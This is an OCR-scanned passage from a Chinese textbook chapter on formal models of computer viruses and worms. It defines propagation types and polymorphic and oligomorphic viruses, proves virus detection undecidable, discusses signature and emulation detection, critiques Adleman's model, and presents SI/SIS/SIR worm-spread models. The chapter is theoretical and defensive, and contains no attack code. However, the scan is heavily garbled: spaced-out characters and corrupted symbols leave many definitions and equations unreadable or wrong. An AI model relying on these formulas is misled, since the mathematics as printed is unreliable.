当 能 够 被 病毒 感染 的 程序 不 依赖 于 操作 系统 时 ,病毒 的 传播 方式 可 能 是 独立 于 操作 系 
统 的 传播 方式 。 例 如 ,在 DOS 系统 下 ,引导 型 病毒 就 是 独立 于 DOS 的 传播 方式 ,因为 在 不 
使 用 DOS 服务 的 情况 下 , 它 也 可 以 对 引导 扇 区 (或 主 引导 扇 区 ) 进 行 感染 。 

定义 2. 12 当 病 毒 只 能 以 专用 计算 机 的 传播 方式 进行 传播 时 ,该 病毒 便 被 称 为 专用 计 
算 机 的 病毒 。 如 果 病 毒 的 所 有 传播 方式 都 独立 于 计算 机 , 则 称 该 病毒 为 独立 于 计算 机 的 
病毒 。 

定义 2.13 ” 当 病 毒 只 能 以 专用 操作 系统 的 传播 方式 进行 传播 时 ,该 病毒 便 被 称 为 专用 
操作 系统 的 病毒 。 如 果 病 毒 的 所 有 传播 方式 都 独立 于 操作 系统 , 则 称 该 病毒 为 独立 于 操作 
系统 的 病毒 。 

很 明显 ,因为 病毒 必须 使 用 能 够 执行 可 执行 文件 的 解释 程序 的 指令 集 ,所 以 独立 于 计算 
机 的 病毒 不 能 感染 可 执行 文件 。 可 执行 文件 来 自 于 用 高 级 程序 语言 编写 的 源 文 件 。 由 于 病 
毒 在 传播 期 间 ,能够 修改 这 些 源 文件 ,因此 病毒 独立 于 执行 病毒 程序 的 处 理 器 。 当 然 , 用 来 
编译 源 代码 的 编译 程序 之 间 必 须 相 协调 (兼容 ) 。 

IBM PC 的 引导 型 病毒 既 属于 专用 计算 机 的 病毒 ,也 属于 独立 于 操作 系统 的 病毒 。 在 
DOS 系统 下 感染 可 执行 文件 和 源 文 件 的 文件 附加 型 病毒 既是 专用 计算 机 的 病毒 又 是 专用 
操作 系统 的 病毒 。 

定义 2.14 如 果 病 毒 在 传播 期 间 附 加 在 可 执行 文件 上 ,那么 称 这 种 方式 为 直接 的 传播 
方式 。 如 果 病 毒 在 传播 期 间 附 加 在 不 可 执行 文件 上 ,那么 称 这 种 方式 为 间接 的 传播 方式 。 

以 直接 传播 方式 传播 的 病毒 感染 可 执行 文件 。 可 执行 文件 能 够 被 操作 系统 或 其 他 程序 
所 解释 。 例 如 ,因为 Word 能 够 解释 并 执行 宏 程序 ,所 以 病毒 能 以 直接 传播 的 方式 感染 
Windows 包含 宏 程序 的 Microsoft Word 文件 。 

以 间接 传播 方式 进行 传播 的 病毒 感染 源 文件 ,因为 这 些 源 文件 必须 被 编译 和 链接 ,所 以 
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病毒 就 可 以 依靠 编译 程序 和 链接 程序 ,以 不 同 的 形式 出 现在 可 执行 文件 中 。 这 样 ,病毒 就 可 
以 完全 在 主机 程序 中 构建 (Build) 。 

2. 多 态 型 病毒 和 少 态 型 病毒 

上 面 所 讨论 的 病毒 的 出 现形 式 在 所 有 感染 场合 中 都 是 一 样 的 。 然 而 ,完全 可 以 想象 病 
毒 能 够 在 感染 期 间 以 某 些 方式 改变 自己 的 形态 。 

定义 2.15 当 有 两 个 程序 区 被 同样 的 病毒 以 指定 传播 方式 感染 ,并 且 病 毒 程序 的 代码 
顺序 不 同时 ,这 种 方式 称 为 多 形态 的 传播 方式 。 

定义 2.16 ” 当 病 毒 具 有 多 形态 传播 方式 时 ,该 病毒 便 被 称 为 多 态 型 病毒 。 

定义 2.17 当 有 两 个 程序 区 被 同样 的 病毒 以 指定 传播 方式 感染 ,并 且 病 毒 程序 的 代码 
顺序 相同 但 至 少 有 一 部 分 病毒 代码 被 使 用 不 同 的 密 钥 加 密 时 ,这 种 传播 方式 称 为 少 形态 的 
传播 方式 。 

定义 2.18 ” 当 病 毒 具有 少 形态 传播 方式 ,并 且 没 有 多 形态 传播 方式 时 ,该 病毒 便 被 称 
为 少 态 型 病毒 。 

很 显然 , 少 态 和 多 态 的 重要 区 别 是 少 态 型 病毒 的 代码 顺序 是 不 变 的 ,而 多 态 型 病毒 强调 
的 是 改变 代码 顺序 。 

当 病 毒 使 用 随机 密 钥 进 行 加 密 时 , 某 个 特殊 的 复制 就 可 能 是 少 态 型 病毒 。 它 能 将 译 码 
部 分 附加 到 被 译 码 的 病毒 程序 上 。 

多 态 型 病毒 的 实现 要 比 少 态 型 病毒 的 实现 复杂 得 多 ,它们 能 改变 自身 的 译 码 部 分 。 例 
如 ,通过 从 准备 好 的 集合 中 任意 选取 译 码 程序 。 该 方法 也 能 通过 在 传播 期 间 随 机 产生 程序 
指令 来 完成 。 例 如 ,可 以 通过 如 下 的 方法 来 实现 。 

(1) 改变 译 码 程序 的 顺序 。 

(2) 处 理 器 能 够 通过 一 个 以 上 的 指令 (序列 ) 来 执行 同样 的 操作 。 

(3) 向 译 码 程序 中 随机 地 放 入 哑 命 令 (Dummy Command) 。 

实际 上 ,存在 着 一 些 少 态 型 病毒 和 多 态 型 病毒 的 子 类 型 。 

定义 2.19 当 病 毒 具有 多 形态 传播 方式 , 却 很 少 使 用 多 形态 性 时 ,该 病毒 被 称 为 不 活 
跃 的 多 态 型 病毒 (Slow-Polymorphic) 。 

定义 2.20 ” 当 病 毒 具有 少 形态 传播 方式 , 却 很 少 改变 代码 程序 的 随机 密 钥 时 ,该 病毒 
被 称 为 不 活跃 的 少 态 型 病毒 (Slow-Oligomorphic) 。 

3. 病毒 的 检测 问题 

随 着 计算 机 病毒 的 出 现 , 病 毒 检测 的 问题 也 随 之 出 现 。 

定义 2.21 病毒 的 检测 问题 是 算法 理论 的 问题 ,也 就 是 说 ,是 否 存 在 决定 某 一 特定 程 
序 能 否 被 病毒 感染 的 特定 算法 。 

假设 对 于 可 执行 文件 而 言 , 处 理 器 的 指令 集 和 每 个 指令 的 操作 都 是 已 知 的 。 对 于 源 文 
件 而 言 ,程序 语言 的 语法 和 编译 器 的 操作 都 是 完全 已 知 的 。 

4. 病毒 检测 的 一 般 问 题 

考虑 Church 定理 (Church-Theorem) ,如 果 存 在 着 某 一 能 够 解决 病毒 检测 问题 的 算法 ， 
那么 就 能 通过 建立 图 灵机 来 执行 相应 的 算法 。 不 幸 的 是 ,即使 在 最 简单 的 情况 下 ,也 不 可 能 
制造 出 这 样 的 图 灵机 。 
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定理 2.10 不 可 能 制造 出 一 个 图 灵机 .并 利用 该 计算 机 判断 RASPM_ABS 中 的 可 执 
行文 件 是 否 含有 病毒 。 
证 明 : 根据 定理 2. 3 可 知 ,不 可 能 创造 RASPM 或 RASPM_ABS 来 模拟 TM( 因 为 模拟 
而 对 程序 的 费用 函数 进行 修改 和 理论 证 明 的 观点 无 关 )。 因 此 ,在 模拟 TM 的 RASPM_ 
ABS 中 创建 一 个 P。 当 待 模 拟 的 TM 在 一 个 可 接受 的 状态 停机 时 ,该 程序 就 在 输出 带 上 记 
上 数字 “1”。 

现在 来 制造 一 个 能 够 感染 程序 的 病毒 。 首 先 ,使 上 面 所 提 到 的 程序 P 包含 病毒 ,这 样 
对 于 任意 的 固定 输入 B 而 言 ,P 一 开始 就 作为 一 个 回答 而 被 执行 ,然后 病毒 也 开始 运行 了 。 
可 以 通过 将 病毒 附加 到 P 上 ,并 在 P 的 每 个 write character 1 指令 后 插入 一 个 JUMP 指令 
来 实现 。 所 以 控制 便 被 传 给 病毒 程序 的 第 一 个 指令 。 在 感染 的 事件 中 ,病毒 程序 不 但 能 复 
制 病毒 程序 而 且 能 复制 程序 P 以 及 固定 输入 B。 

根据 此 程序 ,对 于 任意 的 TM, 都 可 能 在 RASPM_ABS 中 创造 一 个 程序 V, 如 果 V 真正 
能 被 传播 ,那么 它 就 成 为 病毒 。 很 明显 ,如果 程 序 P 和 TM 因为 固定 的 输入 而 停止 运行 , 那 
么 程序 V 就 能 进行 传播 。 

假设 相反 的 情况 : 存在 着 图 灵机 T,T 能 读 RASPM_ABS 的 任何 程序 ,并 且 程序 含有 
病毒 时 输出 数字 “1”, 没 有 病毒 时 输出 数字 *0”。 如 果 TM 用 “1” 来 回答 输入 程序 V, 那 么 程 
序 了 或 相应 的 TM 无 论 如 何 都 将 停止 接受 输入 B。 如 果 回 答 是 “0”, 相 应 的 TM 将 不 会 停 
止 。 因 此 ,作为 对 一 个 输入 的 回答 ,TM 是 能 够 决定 另 一 个 TM 是 否 会 停止 的 。 然 而 ,这 是 
不 可 能 的 。 

结论 为 : 根据 Church 定理 ,不 可 能 建立 用 来 检测 病毒 的 算法 。 

现在 ,认为 定义 2.21 所 定义 的 病毒 检测 问题 是 不 能 解决 的 。 所 以 应 该 限制 该 问题 。 

5. 病毒 检测 方法 

如 果 只 涉及 一 些 已 知 病毒 的 问题 ,那么 就 可 能 简化 病毒 检测 问题 。 在 此 情况 下 ,可 以 将 
已 知 病毒 用 在 检测 算法 上 。 

从 每 个 已 知 病毒 中 提取 一 系列 代码 , 当 病 毒 进行 传播 时 ,它们 就 会 在 每 个 被 感染 了 的 文 
件 中 显示 出 来 ,将 这 一 系列 代码 称 为 序列 。 病 毒 检测 程序 的 任务 就 是 在 程序 中 搜寻 这 些 序 
列 。 然 而 ,关于 这 些 原理 的 算法 ,出 现 了 进一步 的 问题 。 

(1) 不 能 确定 多 态 型 病毒 是 否 含有 某 些 序列 ,通过 这 些 序 列 可 以 检测 病毒 的 所 有 变异 。 

(2) 当 发 现 序列 是 随机 的 时 ,不 知道 发 生 错 误 报 警 的 概率 。 

(3) 该 采用 什么 样 的 费用 标准 来 衡量 序列 搜寻 算法 的 实现 。 

很 明显 ,该 方法 不 能 用 来 检测 多 态 型 病毒 (必须 寻找 其 他 解决 途径 ) ,但 此 方法 却 可 以 用 
来 检测 少 态 型 病毒 。 在 这 样 的 情况 下 ,必须 使 用 病毒 解码 函数 的 代码 来 产生 搜寻 序列 。 

6. 病毒 检测 错误 报警 估算 

发 生 错误 报警 的 数量 与 序列 (特征 代码 ) 的 长 度 有 关 , 又 与 发 现 程序 中 指定 单元 的 值 定 
制 的 可 能 性 有 关 。 如 果 用 N 表示 一 个 序列 的 平均 长 度 , 且 每 个 字符 能 以 相同 的 概率 (也 就 
是 字符 集 大 小 n 的 倒数 ) 出 现 ,并 用 M 表示 序列 的 总 个 数 ,用 L(L>N) 表 示 被 检测 文件 的 
总 长 度 ,那么 在 一 个 文件 中 发 现任 意 序 列 的 概率 为 
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检查 现在 的 费用 标准 ,通过 该 标准 可 以 实现 序列 的 搜寻 算法 。 因 为 人 们 通常 使 用 的 计 
算 机 的 存储 器 的 尺寸 及 其 单元 的 长 度 都 是 固定 的 (RASPM_ABS 的 情况 不 是 这 样 的 ) ,所 以 
每 个 指令 的 费用 都 小 于 一 个 常数 。 因 此 建议 使 用 统一 的 费用 来 计算 。 序 列 搜寻 算法 将 序列 
的 第 一 个 单元 的 内 容 和 每 个 待 检测 单元 的 内 容 进行 比较 。 如 果 检 测 是 分 开 进 行 的 ,那么 必 
须 进 行 直 。M 次 比较 。 但 是 ,序列 是 可 以 根据 它们 第 一 个 单元 的 内 容 进 行 排序 的 。 我 们 利 
用 中 间 位 置 的 特征 开始 检测 ,然后 跟随 程序 向 右 移动 。 倘 若 所 有 序列 的 第 一 个 单元 的 内 容 
均 不 相同 ,那么 使 用 该 方法 就 只 要 进行 二。| logM | 次 比较 ([z ] 表 示 不 小 于 zx 的 整数 ) 。 如 
果 发 现 所 有 序列 的 第 一 个 单元 的 内 容 有 相同 的 ,那么 也 必须 检测 第 二 个 单元 的 内 容 。 所 要 


求 的 进一步 检测 的 预期 值 是 二 。M . 工 。 如 果 在 第 于 个 检测 中 也 出 现 相同 情况 ,那么 要 求 


进一步 的 L。M , 点 次 的 检测 。 所 以 ,所 有 要 求 检测 的 预期 值 为 
二 一 1 
nn 
I 
n 

考虑 到 可 能 出 现 的 最 坏 情况 ,进行 比较 的 最 大 次 数 为 ==L*M * N。 由 于 可 以 通过 比 
较 的 次 数 来 估计 算法 的 时 间 需 求 , 因 此 序列 搜寻 算法 可 以 在 多 项 式 时 间 级 别 实现 。 

为 了 识别 多 态 型 病毒 模型 ,我 们 使 用 模拟 的 方法 。 该 方法 的 实质 就 是 在 处 理 器 进行 仿 
真 (模拟 ) 时 开始 执行 被 检测 的 程序 。 关 于 被 执行 的 指令 ,我们 准备 了 一 份 统计 表 , 该 统计 表 
会 不 断 地 被 用 来 和 已 知 多 态 型 病毒 的 现 有 统计 表 进 行 比较 。 当 发 现 一 致 时 ,病毒 就 被 检测 
出 来 了 。 根 据 此 方法 ,在 译 码 后 ,可 疑 程序 的 操作 代码 就 能 被 检查 出 来 。 与 序列 搜寻 过 程 相 
比 ,序列 代码 中 没有 用 来 和 已 知 代码 比较 的 一 部 分 ,但 是 它 检查 与 序列 代码 的 部 分 操作 代码 
相关 的 统计 表 。 通 过 这 样 的 方法 ,即使 部 分 指令 改变 了 ,病毒 也 能 被 辨别 出 来 。 然 而 ,为 了 
实现 搜寻 安全 和 序列 搜寻 方法 的 可 比较 性 ,统计 表 必 须 基于 更 多 的 序列 代码 。 

但 是 ,仿真 类 型 搜寻 方法 不 能 在 多 项 式 时 间 级 别 实现 ,因为 病毒 能 够 在 译 码 程序 中 在 
在 ,这 些 译 码 程序 是 以 一 个 依赖 于 随机 数 的 指数 时 间 级 别 被 执行 的 。 搜 寻 未 知 病毒 的 一 个 
可 能 方法 就 是 多 态 型 病毒 中 所 提 及 的 处 理 器 仿真 方法 。 然 而 ,在 此 情况 下 ,没有 预先 的 统计 
表 , 但 可 监视 病毒 的 典型 行为 。 例 如 ,在 某 一 程序 中 ,病毒 的 这 些 典 型 行为 有 修改 其 他 程序 ; 
试图 修改 其 他 程序 ; 试图 修改 操作 系统 。 
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2.3 ”基于 递归 函数 的 计算 机 病毒 的 数学 模型 


近 几 十 年 来 ,计算 机 病毒 检测 已 经 成 为 一 个 普遍 问题 。 非 常 明显 ,有 很 大 一 部 分 病毒 具 
有 和 良性 的 或 中 度 破坏 力 。 然 而 ,病毒 是 否 对 计算 环境 具有 重大 潜在 破坏 仍 是 一 个 公开 课题 。 
如 何 从 各 个 方面 对 计算 机 病毒 进行 全 面 的 描述 ,得 到 完善 的 病毒 计算 机 模型 是 一 个 有 待 研 
究 的 问题 。 目 前 ,在 计算 机 病毒 研究 中 有 将 病毒 内 涵 扩 大 化 的 倾向 ,将 任何 具有 破坏 作用 的 
程序 称 为 病毒 。 笔 者 认为 这 掩盖 了 病毒 传染 这 一 本 质 , 不 利于 对 病毒 的 深入 研究 。 
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2.3.1 Adlemen 病毒 模型 


Adlemen 给 出 的 计算 机 病毒 形式 定义 如 下 。 
。 S 表示 所 有 自然 数 有 穷 序 列 的 集合 。 
。，e 表示 一 个 从 SXS 到 NN 的 可 计算 的 入 射 函 数 , 它 具有 可 计算 的 逆 函 数 。 
对 所 有 的 s,:€E S, 用 < s,t> 表 示 e(s,t)。 
对 所 有 部 分 函数 f: N-~N 及 所 有 s,tES, 用 f(s,) 表 示 f(<s,t>)。 
e 表示 一 个 从 NXN 到 NN 的 可 计算 的 人 射 函数 , 它 具 有 可 计算 的 逆 函 数 ,并 且 对 所 
有 i,jEN,e'(i,j) 之 i。 
对 所 有 i,jEN,<i,j > 表示 e'(i,j)。 
对 所 有 部 分 函数 f: N 习 N 及 所 有 i,jEN,f(i,j) 表 示 f(<i,j >)。 
对 所 有 部 分 函数 f; N->N 及 所 有 nEN,f(n) y 表示 f(n) 是 有 定义 的 。 
对 所 有 部 分 函数 f; N 习 N 及 所 有 nEN,f(n) 人 表示 f() 是 未 定义 的 。 
定义 2.22 对 所 有 部 分 函数 f,g: N 一 N 及 所 有 s,1€ES,f(s,1) 二 g(s,t) 当 且 仅 当 
fs BgCssD yy 或 Gy bgs y Bfs,t)=g(s,1)。 
定义 2.23 对 所 有 zz,z'EN,p,p',g 二 qiq2…gs,g' 一 gigs…g.€ES, 任 一 个 部 分 函数 


h;N>N,<p,q>~<p',q'> 当 且 仅 当 z 二 z' 并 且 p 二 p' 并 且 存在 i,1<i<<z, 满 足 qi; 承 q!, 并 
且 对 i 二 1,2,…,z, 以 下 任 一 条 成 立 : 

{1 和 一 df。 

(2) hlgi) 由 并且 h(g;) 二 gq!。 

定义 2.24 对 所 有 部 分 函数 f,g,h: N 一 N 及 所 有 ss,t€ES,f(s,t) 一 g(s,t) 当 且 仅 当 


f(D Veg Dy 7 
定义 2.25 对 所 有 部 分 函数 f,g,h: NN 及 所 有 s.1€ES, f(s,1)~~g(s,t) 当 且 仅 当 


f(s:t) 二 g(s,t) 或 J 

定义 2.26 对 所 有 部 分 递归 函数 的 歌德 尔 配 数 {B;) ,一 个 完全 递归 函数 v 对 {Gi} 来 说 
是 一 个 病毒 , 当 且 仅 当 对 所 有 d,pES, 下 列 条 件 之 一 成 立 。 

(1) 破坏 (Vi,j€EN)[@Bw(d,p)=B (d,p)]。 


(2) 传染 或 模仿 (V jE N)[@ (dp 全 Gu Cd,p)]。 
以 上 用 符号 d、p 的 目的 是 想 将 可 访问 的 信息 区 分 成 数据 (不 会 被 传染 的 信息 ) 和 程序 
(容易 被 传染 ) 。 


2.3.2 Adlemen 病毒 模型 的 分 析 


在 这 里 采用 Fred Cohen 有 关 计 算 机 病毒 的 定义 :“ 病 毒 是 一 种 计算 机 程序 , 它 通过 修 
改 其 他 程序 ,使 其 包含 病毒 程序 自身 或 某 种 变异 ,来 传染 其 他 程序 .” 正 是 由 于 病毒 的 这 种 传 
染 特 性 , 它 才 得 以 传播 。 被 传染 的 程序 包含 了 病毒 , 它 又 传染 其 他 程序 ,使 得 病毒 不 断 传播 。 

传染 是 病毒 的 本 质 。 只 有 当 一 个 程序 具有 传染 特性 时 , 才 认 为 它 是 病毒 ,而 不 管 程序 是 
否 具有 破坏 性 。 按 这 种 观念 ,Adlemen 病毒 模型 有 如 下 缺陷 。 
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(1) 计算 机 病毒 的 面 太 广 。 按 照 Adlemen 病毒 模型 的 定义 ,很 多 不 是 病毒 的 程序 也 被 

认为 是 病毒 。 首 先 考虑 一 个 程序 v: NN。 
VzEN vzr)=d,d€EN 

这 里 工 可 以 是 一 个 程序 或 数据 。 这 个 程序 破坏 其 他 程序 ,但 是 它 不 具备 传染 特性 ,所 
以 它 不 是 病毒 。 然 而 ,按照 Adlemen 病毒 模型 的 定义 , 它 显然 是 一 个 病毒 ,因为 它 满足 " 破 
坏 ” 的 定义 

(Vi € NI)LGup (d,p) = Br (d,p)] 
这 里 v( 让 ==v(j) 二 d。 另 外 一 个 程序 例子 即 所 谓 的 “和 恒 等 函 数 ”w: N 一 NN 
VzEN nz) 一 工 

这 种 不 做 任何 操作 的 程序 v 也 同样 被 不 恰当 地 当成 了 病毒 ,因为 它 满足 “传染 或 模仿 ” 

的 定义 


(Vi € N)[Gi(d,p) Bu Cd,p)] 
这 里 v(j) 二 j。 实 际 上 ,所 使 用 的 大 部 分 程序 f: N 一 N 并 不 修改 其 他 程序 , 即 如 果 p 
是 一 个 程序 的 编码 , 则 f(p)= 二 p。 不 幸 的 是 ,这 种 程序 按照 Adlemen 病毒 模型 的 定义 也 成 
了 病毒 。 显 然 ,按照 这 种 定义 ,大 部 分 程序 将 被 当成 病毒 。 其 主要 问题 在 于 Adlemen 将 “ 模 
仿 ” 作 为 病毒 的 特征 之 一 因而 过 分 扩大 了 病毒 的 范围 。 
(2) 定义 并 没有 反映 出 病毒 的 传染 特性 。 根 据 定义 “传染 或 模仿 ”是 指 


(Vj € NW[®,(d,p) Bu Cd,p)] 
而 这 个 定义 并 不 能 蕴含 v(j) 包 含 v 或 其 变异 。 
(3) 定义 不 能 体现 出 病毒 传染 的 传递 特性 。 被 传染 的 程序 应 该 成 为 病毒 的 载体 , 它 将 
病毒 传染 给 其 他 程序 。 然 而 ,无 法 从 Adlemen 病毒 模型 推出 这 条 性 质 。 
(4)“ 破 坏 ” 的 定义 不 合适 。 根 据 定义 ,如 果 wv 是 一 个 恶意 病毒 , 则 所 有 被 v 传染 的 程序 
其 功能 是 一 样 的 。 实 际 上 ,很 多 病毒 在 进行 恶意 操作 的 同时 还 保留 了 源 程序 的 功能 。 被 感 
染 程序 的 功能 取决 于 病毒 的 功能 和 源 程序 的 功能 。 


2.4 ”Internet 蠕虫 传播 模型 


上 面 已 经 介绍 了 传统 计算 机 病毒 的 两 种 理论 模型 。 考 虑 到 传统 计算 机 病毒 已 经 不 是 恶 
意 代码 的 主流 ,本 文 将 介绍 近 阶 段 的 恶意 代码 典型 代表 一 一 Internet 蠕虫 的 传播 模型 。 

在 对 传统 计算 机 病毒 的 传播 机 制 研究 中 ,常常 借用 已 有 的 传染 病 数 学 模型 ,但 由 于 计算 
机 病毒 的 攻击 对 象 是 文件 系统 ,因此 传统 计算 机 病毒 研究 中 把 计算 机 作为 传播 个 体 并 不 合 
适 。 另 外 ,传统 计算 机 病毒 一 般 情况 下 是 被 动 传播 ,要 有 计算 机 使 用 者 的 参与 ,而 传染 病 模 
型 中 ,只 有 感染 主体 与 被 感染 客体 ,借用 传染 病 模 型 ,就 要 忽略 计算 机 使 用 者 ,而 计算 机 使 用 
者 在 传统 计算 机 病毒 传播 过 程 中 是 相当 重要 的 一 环 。 与 传统 计算 机 病毒 不 同 的 是 ,Internet 
蠕虫 具有 主动 攻击 特征 ,不 需要 计算 机 使 用 者 的 参与 ,并 且 里 虫 的 攻击 对 象 是 计算 机 系统 ， 
这 两 个 条 件 正 好 同 传染 病 模 型 的 假设 条 件 相符 。 

另外 ,已 有 的 讨论 传染 病 数学 模型 局 限 在 固定 总 量 的 传播 群体 ,而 且 只 讨论 传播 的 初始 
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阶段 和 最 后 的 稳定 状态 的 特性 ,没有 考虑 快速 传播 阶段 的 特性 。 在 蠕虫 传播 的 讨论 中 ,认为 
网 络 的 拓扑 结构 对 蠕虫 的 传播 具有 决定 性 的 影响 ,目前 比较 好 的 结果 都 是 基于 随机 同 构 网 
络 得 到 的 。 而 在 Internet 中 应 用 程序 间 进 行 通信 时 由 于 TCP/IP 协议 屏 项 了 网 络 的 拓扑 结 
构 , 因 此 从 应 用 层 程序 的 角度 看 ,可 以 认为 Internet 是 一 个 完全 链接 网 络 。 

本 节 以 更 符合 传染 病 模型 的 Internet 蠕虫 为 研究 对 象 ,介绍 基于 SI (Susceptible- 
Infected) SIS ( Susceptible-Infected-Susceptible) 和 SIR (Susceptible-Infected-Removed ) 
3 种 不 同 传染 病 模型 快速 传播 阶段 的 网 络 特 性 。 关 于 Internet 蠕虫 传播 模型 的 更 深层 次 的 
介绍 请 参考 南开 大 学 郑 辉 博士 的 学 位 论文 (Internet 蠕虫 研究 》。 


2.4.1 SIS 模型 和 SI 模型 


假设 在 一 定 环境 中 , 当 某 种 群 中 不 存在 流行 病 时 ,其 种 群 (N) 的 生长 服从 微分 系统 
N’ = be“N—daN (2-1) 
其 中 ,N= 二 N(7) ,表示 t 时刻 该 环境 中 总 种 群 的 个 体 数量 ; be 中 表示 种 群 中 单位 个 体 的 生育 
率 ; d 表示 单位 个 体 的 自然 死亡 率 ,5>d>0,a>0。 当 流行 病 存在 于 该 种 群 中 时 ,疾病 的 传 
染 机 制 如 图 2-5 所 示 。 


peAAN ~-S BSI Ee rl 


| | 


ds (d+o)r 
图 2-5 疾病 的 传染 机 制 


这 里 ,SI 分 别 表 示 易 感 者 类 和 染病 者 类 ,其 中 所 有 的 参数 均 为 正常 数 。 且 we-wN 表 
示 外 界 对 环境 的 输入 ; 8 表示 一 个 染病 者 所 具有 的 最 大 传染 力 ; r(r 二 0) 表 示 疾 病 的 恢复 
力 ; d,a(a 二 0) 表 示 自 然 死 亡 率 和 额外 死亡 率 。 

所 以 ,流行 病 的 传播 服从 双 线 形 传染 率 8ST(8>0) 的 SIS 模型 , 即 


S’=be WN—BSI—dS+rl 
(2-2) 
I = BSI— (d+a+nI 


这 时 总 种 群 的 生长 服从 系统 。 
N’=be™N—dN—al (2-3) 
其 中 ,S==S(W) 和 了 = 二 1(1) 分 别 表示 t 时 刻 易 感 类 (S) 和 染病 类 (7) 中 个 体 的 数量 , N (7) 一 
-| TY 
在 SIS 模型 中 , 当 一 0 时 ,该 模型 变 为 SI 模型 。 


2.4.2 SIR 模型 


众所周知 ,如 果 在 计算 机 系统 中 有 已 感染 恶意 代码 的 可 执行 程序 传人 ,只 要 其 中 被 恶意 
代码 感染 (带菌 者 ) 的 可 执行 文件 运行 (运行 就 是 接触 ,接触 就 可 能 传播 恶意 代码 ) ,就 会 造成 
恶意 代码 在 系统 中 的 传播 。 现 作 如 下 两 个 假设 。 

(1) 已 被 恶意 代码 感染 的 文件 ( 档 ) 具 有 免疫 力 。 

(2) 恶意 代码 的 潜伏 期 很 短 ,近似 地 认为 等 于 零 。 
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这 样 就 可 以 把 系统 中 的 可 执行 程序 分 为 3 种 。 

(1) 被 传播 对 象 , 即 尚 未 感染 恶意 代码 的 可 执行 程序 ,用 S(z) 表 示 其 数目 。 

(2) 带菌 者 , 即 已 感染 恶意 代码 的 可 执行 程序 ,用 p(z) 表 示 其 数目 。 

(3) 被 感染 后 具有 免疫 力 的 可 执行 程序 ,也 包括 被 传播 后 在 一 定时 间 内 不 会 运行 的 可 
执行 程序 (相当 于 患 病 者 死去 ) ,用 R(z) 表 示 其 数目 。 


它们 满足 如 下 条 件 。 
dS 有 
a =—AkpS 
(2-4) 
dR 
A 
其 中 ,4 表示 传播 (感染 ) 速 度 ;表示 每 个 时 间 段 接触 次 数 ; y 表示 第 二 种 程序 变 成 第 三 种 
程序 的 速度 。 


对 式 (2-4) 进 行 如 下 解释 。 

(1) S() 的 变化 率 , 即 经 第 一 种 程序 变 成 第 二 种 程序 的 变化 率 , 它 与 传染 者 和 被 传染 者 
之 间 的 接触 次 数 有 关 , 并 且 正 比 于 这 两 类 文件 的 乘积 。 

(2) R(7) 的 变化 率 , 即 第 二 种 程序 变 成 第 三 种 程序 的 变化 率 ,与 当时 第 二 种 的 可 执行 程 
序数 目 成 正比 。 

(3) 在 考虑 的 时 间 间 隔 内 ,系统 内 可 执行 程序 的 总 数 变化 不 大 ,并 且 假 设 它 恒 等 于 常数 
( 既 没 有 文件 被 撤销 ,也 没有 外 面 的 新 文件 进来 ), 从 而 可 执行 程序 总 数 的 变化 率 为 零 。 因 
此 有 


SC) 十 o(t) 十 尺 Ct) 一 入 (2-5) 
即 
de__dSs_dR : 
dt dt dt G06 
将 式 (2-4) 和 式 (2-5) 联 合 得 
ds 二 
i AkpS 
de —— pp tAkps (2-7) 
dR 
3 


该 模型 的 最 重要 的 特征 就 是 存在 着 一 个 非 零 的 阀 值 4.。 如 果 X 二 4. ,那么 有 限 数目 的 文 
件 会 感染 恶意 代码 ; 如 果 4 二 4. ,那么 被 感染 的 总 文件 数 R- 一 limR(z) 便 为 一 个 很 小 的 值 
(相对 于 具有 很 多 个 文件 的 庞大 系统 而 言 );。 为 了 更 好 地 理解 这 些 概念 ,现在 考虑 式 (2-4)， 
不 失 一 般 性 , 令 yy 二 1, 并 给 出 初始 条 件 R(0) 二 0 和 S(0) 二 1( 即 假设 一 开始 被 感染 的 文件 数 
极 少 ,也 就 是 说 p(0) 二 0) ,那么 ,就 得 到 
S00 = E20 (2-8) 
结合 式 (2-5) ,发 现 被 恶意 代码 感染 的 总 文件 R- 满 足下 面 的 自 相关 的 等 式 。 
R =1—e*e (2-9) 


第 2 章 恶意 代码 模型 及 机 制 45 


R- 二 0 则 是 使 式 (2-9) 恒 成 立 的 解 。 为 了 得 到 非 零 解 ,必须 满足 如 下 条 件 。 


d sR 
Ri € ) |R- 王 0 二 1 (2-107) 


该 条 件 和 限制 条 件 4 二 4. 意义 相同 ,在 此 特殊 情况 下 , 设 4. 二 k-'。 在 4 二 4. 处 进行 泰 勘 
展开 ,就 可 以 得 到 恶意 代码 的 感染 行为 R 一 (4 一 4.)( 比 流行 病 阐 值 有 效 )。 在 非 平 衡 状 态 
转换 的 物理 语言 中 ,流行 病 辣 值 完全 等 同 于 临界 带 点 的 值 。 在 对 类 似 现象 进行 推理 时 ,可 以 
将 Rs 和 4 分别 看 成 状态 转换 的 顺序 参数 及 调整 参数 。 


2.4.3 网 络 模型 中 蠕虫 传播 的 方式 


1. 蠕虫 的 工作 方式 

通过 对 已 经 出 现 过 的 Internet 蠕虫 进行 分 析 ,可 以 把 蠕虫 的 工作 方式 归纳 如 下 。 

(1) 随机 产生 一 个 IP 地 址 。 

(2) 判断 对 应 此 IP 地 址 的 计算 机 是 否 可 被 感染 。 

(3) 如 果 可 被 感染 , 则 感染 之 。 

(4) 重复 (1) 一 (3) 步 m 次 ,m 为 蠕虫 产生 的 繁殖 副本 数量 。 

2. 完全 链接 网 络 模型 

完全 链接 网 络 指 的 是 网 络 中 所 有 的 节点 之 间 都 有 直接 链接 。 在 完全 链接 网 络 中 ,网 络 
节点 数 的 增 减 对 网 络 性质 没 有 影响 。 蠕 虫 的 传播 基础 是 Internet, 由 于 Internet 中 计算 机 
依靠 IP 地 址 来 相互 识别 ,在 通信 时 只 考虑 是 否 可 达 , 而 不 考虑 信息 传送 的 具体 途径 , 即 与 网 
络 的 实际 拓扑 结构 无 关 , 因 此 相对 于 应 用 层 的 程序 来 讲 ,Internet 可 以 看 成 是 一 个 以 IP 地 
址 为 节点 的 完全 链接 网 络 。Nicholas Weaver 研究 蠕虫 传播 速度 时 ,也 把 Internet 看 成 一 个 
完全 链接 网 络 来 处 理 , 但 没有 深入 讨论 传播 模型 本 身 固有 的 性 质 。 

由 于 整个 Internet 中 存在 空 IP 地 址 (尚未 分 配 或 没有 设置 在 具体 的 计算 机 上 ) ,另外 ， 
对 蠕虫 传播 来 讲 ,很 多 IP 地 址 对 应 的 计算 机 对 某 种 蠕虫 是 免疫 的 (操作 系统 不 同 、 无 漏洞 
等 ) ,因此 考虑 将 这 些 蠕虫 不 能 感染 的 IP 地 址 对 应 的 节点 从 网 络 中 除去 ,对 于 只 由 易 被 感染 
